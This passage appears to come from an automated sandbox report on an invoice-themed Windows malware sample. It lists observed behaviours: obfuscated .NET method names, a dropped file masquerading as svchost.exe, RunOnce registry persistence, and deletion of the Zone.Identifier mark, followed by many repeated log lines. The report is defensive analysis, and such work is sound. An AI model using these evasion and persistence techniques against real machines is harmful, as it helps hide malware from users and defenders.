      Source: 18.2.CasPol.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

      Persistence and Installation Behavior:

      barindex
      Drops PE files with benign system namesShow sources
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeJump to dropped file
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJgJump to behavior
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJgJump to behavior
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJgJump to behavior
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce RoFLjAgKuqBmXmsAdKjJgJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
